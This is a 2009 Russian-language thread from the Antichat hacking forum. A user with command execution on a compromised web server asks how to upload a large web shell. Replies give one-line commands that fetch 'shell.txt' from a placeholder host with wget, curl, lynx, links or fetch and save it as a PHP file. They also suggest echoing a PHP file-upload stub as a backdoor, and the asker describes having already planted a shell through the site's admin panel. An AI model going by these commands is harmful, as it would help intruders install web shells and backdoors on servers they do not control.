HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.11.2009, 16:46
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию

Почему не работает команда lynx ? Вроде делаю всё прально:

lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html

На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён.Touch работает.Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...

Последний раз редактировалось GenTao; 24.11.2009 в 16:50..
 
Ответить с цитированием

  #2  
Старый 24.11.2009, 16:51
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами: 9328706

Репутация: 1503
По умолчанию

Цитата:
Сообщение от GenTao  
Почему не работает команда lynx ? Вроде делаю всё прально:

lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html

На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён
Посмотри есть ли сама качалка
Цитата:
which wget; which curl; which lynx; which links; which fetch
потом уже качай
Цитата:
wget http://site.com/shell.txt -O /home/user/shell.php
links -source http://site.com/shell.txt > /home/user/shell.php
lynx -source http://site.com/shell.txt > /home/user/shell.php
fetch -o http://site.com/shell.txt -p /home/user/shell.php
curl http://site.com/shell.txt -o /home/user/shell.php
UPDATE:
не проверил, но мне кажется синтаксис мягко говоря не верный.
"www.obsd.si/faq/pf/index.html" ...
(Чисто субъективное мнение, ни тебе протокола, ни здавствуйте, ни досвиданья! =))
__________________

You may say I'm a dreamer
But I'm not the only one

Последний раз редактировалось Twoster; 24.11.2009 в 16:54..
 
Ответить с цитированием

  #3  
Старый 24.11.2009, 16:58
(Dm)
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
С нами: 9521666

Репутация: 1695
По умолчанию

Цитата:
Сообщение от GenTao  
Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Ага, типа
Цитата:
echo "<?phpinfo();?>" > /tmp/test.php
в место phpinfo, думаю стоит указать что-то типа:
Цитата:
copy($_FILES['filename']['tmp_name'], '/куда/надо/записать.php');
и через этот скрипт средствами php уже грузить любые файлы.
__________________
Cервер cs 1.6
cs.antichat.net:27015
 
Ответить с цитированием

  #4  
Старый 24.11.2009, 16:52
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию

Качалка есть,проверял
 
Ответить с цитированием

  #5  
Старый 24.11.2009, 17:01
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Посмотри есть ли сама качалка
Цитата:
which wget; which curl; which lynx; which links; which fetch
Код:
which which wget curl lynx links fetch
 
Ответить с цитированием

  #6  
Старый 24.11.2009, 17:03
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами: 9328706

Репутация: 1503
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
which which wget curl lynx links fetch
да, спасибо, мне стало лучше, особенно
Цитата:
which which ...
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #7  
Старый 24.11.2009, 17:05
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
да, спасибо, мне стало лучше, особенно
Цитата:
which which ...
Это чтобы проверить есть ли which, если ты не понял =\
 
Ответить с цитированием

  #8  
Старый 24.11.2009, 17:09
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами: 9328706

Репутация: 1503
По умолчанию

Цитата:
Сообщение от mailbrush  
Это чтобы проверить есть ли which, если ты не понял =\
А which тебе что покажет, если его нет?
т.е. результат which which и which curl будет разный, если самого which нету? =\

З.Ы. Модеры, сорри
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #9  
Старый 24.11.2009, 23:52
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от Twoster  
А which тебе что покажет, если его нет?
т.е. результат which which и which curl будет разный, если самого which нету? =\

З.Ы. Модеры, сорри
Если which нету, значит результат будет пустой, поэтому он не покажет есть ли качалки или их нет...
 
Ответить с цитированием

  #10  
Старый 24.11.2009, 17:16
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами: 8730155

Репутация: -1
По умолчанию

Хм..попробовал:

echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php

Чет не канает...

Кстати,sudo команда доступна...Забыл добавить,что админка -
Код:
Siteman2
Там ещё фильтруются двойные кавычки,посему пришлось извращаться через селект и лить свой убогий шелл).Оттуда и выполняю команды теперь.

Последний раз редактировалось GenTao; 24.11.2009 в 17:20..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.